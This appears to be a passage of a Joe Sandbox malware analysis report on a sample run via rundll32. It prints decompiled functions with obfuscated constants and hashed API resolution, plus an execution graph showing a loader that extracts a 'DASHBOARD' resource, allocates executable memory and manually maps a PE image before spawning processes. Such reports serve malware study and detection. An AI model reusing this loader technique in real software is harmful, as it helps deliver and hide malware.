                                                                                                                      0x0043e2f4
                                                                                                                      0x0043e30c
                                                                                                                      0x0043e30f
                                                                                                                      0x0043e316
                                                                                                                      0x0043e31d
                                                                                                                      0x0043e324
                                                                                                                      0x0043e32b
                                                                                                                      0x0043e332
                                                                                                                      0x0043e339
                                                                                                                      0x0043e349
                                                                                                                      0x0043e354
                                                                                                                      0x0043e359

                                                                                                                      APIs
                                                                                                                      • SHFileOperationW.SHELL32(000DA62A), ref: 0043E354
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileOperation
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3080627654-0
                                                                                                                      • Opcode ID: df6e4e8d08ba67a79e6cc9105b91064a7161cfa041adeded471142a79e914314
                                                                                                                      • Instruction ID: 4d71fc07d90306f0274edaf008d109402d71a9aff5a76df7df67c4c4bde58ec3
                                                                                                                      • Opcode Fuzzy Hash: df6e4e8d08ba67a79e6cc9105b91064a7161cfa041adeded471142a79e914314
                                                                                                                      • Instruction Fuzzy Hash: F00113B1D00308FBDF51DFE9E94A88DBBB0EF00318F60C189E81466251EBB98B589F05
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00433CBB Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00433CBB() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _t37;

				_v20 = _v20 & 0x00000000;
				_v24 = 0x868838;
				_v16 = 0xb6c7ac;
				_t37 = 0x79;
				_v16 = _v16 * 0x7d;
				_v16 = _v16 ^ 0x593c5b8b;
				_v8 = 0x23929;
				_v8 = _v8 | 0xd856564b;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x67f2afdd;
				_v12 = 0x42ac5b;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x0009f0c4;
				E00422D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
				ExitProcess(0);
			}









                                                                                                                      0x00433cc1
                                                                                                                      0x00433cc7
                                                                                                                      0x00433cce
                                                                                                                      0x00433cdb
                                                                                                                      0x00433ce2
                                                                                                                      0x00433ce5
                                                                                                                      0x00433cec
                                                                                                                      0x00433cf3
                                                                                                                      0x00433cfa
                                                                                                                      0x00433cfe
                                                                                                                      0x00433d01
                                                                                                                      0x00433d08
                                                                                                                      0x00433d19
                                                                                                                      0x00433d1c
                                                                                                                      0x00433d31
                                                                                                                      0x00433d3b

                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00433D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: 323fb5b1a5f7030883cdfc05723f59abec137e44b7013b40dd65927f7f30101c
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: D70144B6D0020CFFDB04DFE5D946A9DBBB0EB00304F508089E925AB290D7B81B50DF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0043FC96 Relevance: 1.3, APIs: 1, Instructions: 41stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E0043FC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t32;
				int _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0042CF25(_t32);
				_v8 = 0x178fa1;
				_v8 = _v8 | 0x2f4d5c19;
				_v8 = _v8 + 0xda24;
				_t42 = 0x35;
				_v8 = _v8 / _t42;
				_v8 = _v8 ^ 0x00e923af;
				_v16 = 0xca5f26;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x97c71065;
				_v12 = 0xeb54f5;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x0000b8cd;
				E00422D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
				_t40 = lstrcmpiW(_a12, _a4); // executed
				return _t40;
			}









                                                                                                                      0x0043fc9c
                                                                                                                      0x0043fc9f
                                                                                                                      0x0043fca2
                                                                                                                      0x0043fca7
                                                                                                                      0x0043fcac
                                                                                                                      0x0043fcb6
                                                                                                                      0x0043fcbf
                                                                                                                      0x0043fccb
                                                                                                                      0x0043fcd3
                                                                                                                      0x0043fcd6
                                                                                                                      0x0043fcdd
                                                                                                                      0x0043fce4
                                                                                                                      0x0043fce8
                                                                                                                      0x0043fcef
                                                                                                                      0x0043fcf6
                                                                                                                      0x0043fcfa
                                                                                                                      0x0043fd15
                                                                                                                      0x0043fd23
                                                                                                                      0x0043fd28

                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNEL32(?,0000B8CD), ref: 0043FD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: f20573446d29a0c66b37199b630e45763a43f071123ae71b6b38bf2dd049977c
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction Fuzzy Hash: C6011376D00208BFDF05EFE5DD4A89EBBB1EB44304F10C098E9146A250DBB69B64DB41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23
                                                                                                                      execution_graph 31784 10035042 TlsGetValue 31785 10035076 GetModuleHandleA 31784->31785 31786 10035055 31784->31786 31788 10035085 GetProcAddress 31785->31788 31789 1003509f 31785->31789 31786->31785 31787 1003505f TlsGetValue 31786->31787 31791 1003506a 31787->31791 31790 1003506e 31788->31790 31790->31789 31792 10035095 RtlEncodePointer 31790->31792 31791->31785 31791->31790 31792->31789 31793 10020c26 31796 10020c32 __EH_prolog3 31793->31796 31795 10020c80 31820 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31795->31820 31796->31795 31804 1002083b EnterCriticalSection 31796->31804 31818 100201f1 RaiseException __CxxThrowException@8 31796->31818 31819 1002094b TlsAlloc InitializeCriticalSection 31796->31819 31800 10020c8d 31801 10020c93 31800->31801 31802 10020ca6 ~_Task_impl 31800->31802 31821 100209ed 88 API calls 5 library calls 31801->31821 31811 1002085a 31804->31811 31805 10020916 _memset 31806 1002092a LeaveCriticalSection 31805->31806 31806->31796 31807 10020893 31822 10014460 31807->31822 31808 100208a8 GlobalHandle GlobalUnlock 31810 10014460 ctype 80 API calls 31808->31810 31813 100208c5 GlobalReAlloc 31810->31813 31811->31805 31811->31807 31811->31808 31814 100208cf 31813->31814 31815 100208f7 GlobalLock 31814->31815 31816 100208da GlobalHandle GlobalLock 31814->31816 31817 100208e8 LeaveCriticalSection 31814->31817 31815->31805 31816->31817 31817->31815 31819->31796 31820->31800 31821->31802 31823 10014477 ctype 31822->31823 31824 1001448c GlobalAlloc 31823->31824 31826 10013ba0 80 API calls _DebugHeapAllocator 31823->31826 31824->31814 31826->31824 31827 10030d06 31828 10030d12 31827->31828 31829 10030d0d 31827->31829 31833 10030c10 31828->31833 31845 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31829->31845 31832 10030d23 31834 10030c1c __setmbcp 31833->31834 31838 10030c69 31834->31838 31842 10030cb9 __setmbcp 31834->31842 31846 10030a37 31834->31846 31838->31842 31900 100125c0 31838->31900 31839 10030c99 31841 10030a37 __CRT_INIT@12 165 API calls 31839->31841 31839->31842 31840 100125c0 ___DllMainCRTStartup 146 API calls 31843 10030c90 31840->31843 31841->31842 31842->31832 31844 10030a37 __CRT_INIT@12 165 API calls 31843->31844 31844->31839 31845->31828 31847 10030b61 31846->31847 31848 10030a4a GetProcessHeap HeapAlloc 31846->31848 31851 10030b67 31847->31851 31852 10030b9c 31847->31852 31849 10030a67 31848->31849 31850 10030a6e GetVersionExA 31848->31850 31849->31838 31853 10030a89 GetProcessHeap HeapFree 31850->31853 31854 10030a7e GetProcessHeap HeapFree 31850->31854 31851->31849 31859 10030b86 31851->31859 31948 100310be 67 API calls _doexit 31851->31948 31855 10030ba1 31852->31855 31856 10030bfa 31852->31856 31857 10030ab5 31853->31857 31854->31849 31932 10035135 6 API calls __decode_pointer 31855->31932 31856->31849 31967 10035425 79 API calls 2 library calls 31856->31967 31922 10036624 HeapCreate 31857->31922 31859->31849 31949 100389ee 68 API calls ___convertcp 31859->31949 31860 10030ba6 31933 10035840 31860->31933 31865 10030aeb 31865->31849 31868 10030af4 31865->31868 31939 1003548e 78 API calls 6 library calls 31868->31939 31869 10030b90 31950 10035178 70 API calls 2 library calls 31869->31950 31870 10030bbe 31952 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31870->31952 31873 10030b95 31951 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31873->31951 31876 10030af9 __RTC_Initialize 31878 10030b0c GetCommandLineA 31876->31878 31892 10030afd 31876->31892 31941 10038d66 77 API calls 3 library calls 31878->31941 31879 10030bd0 31881 10030bd7 31879->31881 31882 10030bee 31879->31882 31953 100351b5 67 API calls 4 library calls 31881->31953 31954 1002fa69 31882->31954 31884 10030b1c 31942 100387ae 72 API calls 3 library calls 31884->31942 31886 10030bde GetCurrentThreadId 31886->31849 31888 10030b26 31889 10030b2a 31888->31889 31944 10038cad 111 API calls 3 library calls 31888->31944 31943 10035178 70 API calls 2 library calls 31889->31943 31940 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31892->31940 31893 10030b36 31894 10030b4a 31893->31894 31945 10038a3a 110 API calls 6 library calls 31893->31945 31899 10030b02 31894->31899 31947 100389ee 68 API calls ___convertcp 31894->31947 31897 10030b3f 31897->31894 31946 10030f4d 75 API calls 3 library calls 31897->31946 31899->31849 31993 10006a90 31900->31993 31903 1001265a 32027 1002fe65 105 API calls 7 library calls 31903->32027 31904 1001261c FindResourceW LoadResource SizeofResource 31907 10006a90 ___DllMainCRTStartup 67 API calls 31904->31907 31910 10012744 ___DllMainCRTStartup 31907->31910 31909 1001284d 31909->31839 31909->31840 31911 100127b7 VirtualAlloc 31910->31911 31912 1001279b VirtualAllocExNuma 31910->31912 31913 100127da 31911->31913 31912->31913 31998 1002fb00 31913->31998 31917 100127fa 32021 10002970 31917->32021 31919 10012810 ___DllMainCRTStartup 32024 100026a0 31919->32024 31921 10012664 32028 1002f81e 5 API calls __invoke_watson 31921->32028 31923 10036647 31922->31923 31924 10036644 31922->31924 31968 100365c9 67 API calls 3 library calls 31923->31968 31924->31865 31926 1003664c 31927 10036656 31926->31927 31928 1003667a 31926->31928 31969 10035aca HeapAlloc 31927->31969 31928->31865 31930 10036660 31930->31928 31931 10036665 HeapDestroy 31930->31931 31931->31924 31932->31860 31936 10035844 31933->31936 31935 10030bb2 31935->31849 31935->31870 31936->31935 31937 10035864 Sleep 31936->31937 31970 10030678 31936->31970 31938 10035879 31937->31938 31938->31935 31938->31936 31939->31876 31940->31899 31941->31884 31942->31888 31943->31892 31944->31893 31945->31897 31946->31894 31947->31889 31948->31859 31949->31869 31950->31873 31951->31849 31952->31879 31953->31886 31956 1002fa75 __setmbcp 31954->31956 31955 1002faee __dosmaperr __setmbcp 31955->31899 31956->31955 31966 1002fab4 31956->31966 31989 10035a99 67 API calls 2 library calls 31956->31989 31957 1002fac9 HeapFree 31957->31955 31959 1002fadb 31957->31959 31992 100311f4 67 API calls __getptd_noexit 31959->31992 31961 1002fae0 GetLastError 31961->31955 31962 1002faa6 31991 1002fabf LeaveCriticalSection _doexit 31962->31991 31963 1002fa8c ___sbh_find_block 31963->31962 31990 10035b3d VirtualFree VirtualFree HeapFree __fptostr 31963->31990 31966->31955 31966->31957 31967->31849 31968->31926 31969->31930 31971 10030684 __setmbcp 31970->31971 31972 1003069c 31971->31972 31982 100306bb _memset 31971->31982 31983 100311f4 67 API calls __getptd_noexit 31972->31983 31974 100306a1 31984 10037753 4 API calls 2 library calls 31974->31984 31975 100306b1 __setmbcp 31975->31936 31977 1003072d RtlAllocateHeap 31977->31982 31982->31975 31982->31977 31985 10035a99 67 API calls 2 library calls 31982->31985 31986 100362e6 5 API calls 2 library calls 31982->31986 31987 10030774 LeaveCriticalSection _doexit 31982->31987 31988 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 31982->31988 31983->31974 31985->31982 31986->31982 31987->31982 31988->31982 31989->31963 31990->31962 31991->31966 31992->31961 31994 1002f9a6 _malloc 67 API calls 31993->31994 31995 10006aa1 31994->31995 31996 1002fa69 ___convertcp 67 API calls 31995->31996 31997 10006aad 31995->31997 31996->31997 31997->31903 31997->31904 31999 1002fb18 31998->31999 32000 1002fb3f __VEC_memcpy 31999->32000 32001 100127eb 31999->32001 32000->32001 32002 1002f9a6 32001->32002 32003 1002fa53 32002->32003 32014 1002f9b4 32002->32014 32036 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32003->32036 32005 1002fa59 32037 100311f4 67 API calls __getptd_noexit 32005->32037 32008 1002fa5f 32008->31917 32011 1002fa17 RtlAllocateHeap 32011->32014 32012 1002f9c9 32012->32014 32029 10036892 67 API calls __NMSG_WRITE 32012->32029 32030 100366f2 67 API calls 6 library calls 32012->32030 32031 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32012->32031 32014->32011 32014->32012 32015 1002fa4a 32014->32015 32016 1002fa3e 32014->32016 32019 1002fa3c 32014->32019 32032 1002f957 67 API calls 4 library calls 32014->32032 32033 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32014->32033 32015->31917 32034 100311f4 67 API calls __getptd_noexit 32016->32034 32035 100311f4 67 API calls __getptd_noexit 32019->32035 32022 1002f9a6 _malloc 67 API calls 32021->32022 32023 10002990 32022->32023 32023->31919 32038 10002280 32024->32038 32027->31921 32028->31909 32029->32012 32030->32012 32032->32014 32033->32014 32034->32019 32035->32015 32036->32005 32037->32008 32075 10001990 32038->32075 32041 100022c3 SetLastError 32072 100022a9 32041->32072 32042 100022d5 32043 10001990 ___DllMainCRTStartup SetLastError 32042->32043 32044 100022ee 32043->32044 32045 10002310 SetLastError 32044->32045 32046 10002322 32044->32046 32044->32072 32045->32072 32047 10002331 SetLastError 32046->32047 32048 10002343 32046->32048 32047->32072 32049 1000234e SetLastError 32048->32049 32051 10002360 GetNativeSystemInfo 32048->32051 32049->32072 32052 10002414 SetLastError 32051->32052 32053 10002426 VirtualAlloc 32051->32053 32052->32072 32054 10002472 GetProcessHeap HeapAlloc 32053->32054 32055 10002447 VirtualAlloc 32053->32055 32057 100024ac 32054->32057 32058 1000248c VirtualFree SetLastError 32054->32058 32055->32054 32056 10002463 SetLastError 32055->32056 32056->32072 32059 10001990 ___DllMainCRTStartup SetLastError 32057->32059 32058->32072 32060 1000250e 32059->32060 32061 1000251c VirtualAlloc 32060->32061 32069 10002512 32060->32069 32062 1000254b ___DllMainCRTStartup 32061->32062 32078 100019c0 32062->32078 32065 1000257f ___DllMainCRTStartup 32065->32069 32088 10001ff0 32065->32088 32113 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32069->32113 32070 100025e8 ___DllMainCRTStartup 32070->32069 32070->32072 32107 48d80c 32070->32107 32072->31921 32073 1000264f SetLastError 32073->32069 32076 100019ab 32075->32076 32077 1000199f SetLastError 32075->32077 32076->32041 32076->32042 32076->32072 32077->32076 32080 100019f0 32078->32080 32079 10001a83 32082 10001990 ___DllMainCRTStartup SetLastError 32079->32082 32080->32079 32081 10001a2c VirtualAlloc 32080->32081 32087 10001aa0 ___DllMainCRTStartup 32080->32087 32083 10001a50 32081->32083 32084 10001a57 ___DllMainCRTStartup 32081->32084 32085 10001a9c 32082->32085 32083->32087 32084->32080 32086 10001aa4 VirtualAlloc 32085->32086 32085->32087 32086->32087 32087->32065 32089 10002029 IsBadReadPtr 32088->32089 32090 1000201f 32088->32090 32089->32090 32092 10002053 32089->32092 32090->32069 32101 10001cb0 32090->32101 32092->32090 32093 10002085 SetLastError 32092->32093 32094 10002099 32092->32094 32093->32090 32114 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32094->32114 32096 100020b3 32097 100020bf SetLastError 32096->32097 32099 100020e9 32096->32099 32097->32090 32099->32090 32100 100021f9 SetLastError 32099->32100 32100->32090 32105 10001cf8 ___DllMainCRTStartup 32101->32105 32102 10001e01 32103 10001b80 ___DllMainCRTStartup 2 API calls 32102->32103 32106 10001ddd 32103->32106 32105->32102 32105->32106 32115 10001b80 32105->32115 32106->32070 32108 48d8a5 32107->32108 32112 48d8cc 32107->32112 32122 485cf9 32108->32122 32112->32072 32112->32073 32113->32072 32114->32096 32116 10001b9c 32115->32116 32119 10001b92 32115->32119 32117 10001c04 VirtualProtect 32116->32117 32120 10001baa 32116->32120 32117->32119 32119->32105 32120->32119 32121 10001be2 VirtualFree 32120->32121 32121->32119 32132 486288 32122->32132 32123 48648d 32146 479700 32123->32146 32126 48648b 32126->32112 32135 483cbb 32126->32135 32130 47ab66 GetPEB 32130->32132 32132->32123 32132->32126 32132->32130 32134 47ae03 GetPEB 32132->32134 32138 48fc96 32132->32138 32142 47ea7b 32132->32142 32156 491310 32132->32156 32160 4912a8 GetPEB 32132->32160 32161 47e7ce GetPEB 32132->32161 32162 48e35a GetPEB 32132->32162 32134->32132 32136 472d9f GetPEB 32135->32136 32137 483d36 ExitProcess 32136->32137 32137->32112 32139 48fcac 32138->32139 32163 472d9f 32139->32163 32143 47ea9f 32142->32143 32144 472d9f GetPEB 32143->32144 32145 47eb24 SHGetFolderPathW 32144->32145 32145->32132 32147 47972e 32146->32147 32148 491310 GetPEB 32147->32148 32149 479995 32148->32149 32171 48679c 32149->32171 32151 4799d1 32153 4799dc 32151->32153 32175 484dad GetPEB 32151->32175 32153->32126 32154 4799fc 32176 484dad GetPEB 32154->32176 32157 49132d 32156->32157 32177 473efe 32157->32177 32160->32132 32161->32132 32162->32132 32164 472e5b 32163->32164 32165 472e80 lstrcmpiW 32163->32165 32169 48c761 GetPEB 32164->32169 32165->32132 32167 472e6a 32170 47f2c1 GetPEB 32167->32170 32169->32167 32170->32165 32172 4867d5 32171->32172 32173 472d9f GetPEB 32172->32173 32174 486847 CreateProcessW 32173->32174 32174->32151 32175->32154 32176->32153 32178 473f17 32177->32178 32181 473cd1 32178->32181 32182 473cec 32181->32182 32183 472d9f GetPEB 32182->32183 32184 473d79 32183->32184 32184->32132

                                                                                                                      Executed Functions

                                                                                                                      Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510D0,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$DASHBOARD$d$d$e$kre3.l$kxnY_L?zqlSEuu5S2VFol6SH1q?86X^fU74B$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-1239791992
                                                                                                                      • Opcode ID: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction ID: 6af05ad5a12929315e9cbc9f274344785a9cdc676413f0efaf09fcd5afa7189b
                                                                                                                      • Opcode Fuzzy Hash: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction Fuzzy Hash: 50613FB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 63 100023c7-100023cd 57->63 58->63 59->41 61 10002472-1000248a GetProcessHeap HeapAlloc 60->61 62 10002447-10002461 VirtualAlloc 60->62 65 100024ac-10002510 call 10001990 61->65 66 1000248c-100024a7 VirtualFree SetLastError 61->66 62->61 64 10002463-1000246d SetLastError 62->64 67 100023d5 63->67 68 100023cf-100023d2 63->68 64->41 72 10002512 65->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 65->73 66->41 67->54 68->67 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 102 10002621-10002643 call 48d80c 100->102 103 1000266a-10002678 100->103 104 10002687-1000268a 101->104 106 10002646-1000264d 102->106 105 1000267b 103->105 104->41 105->104 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
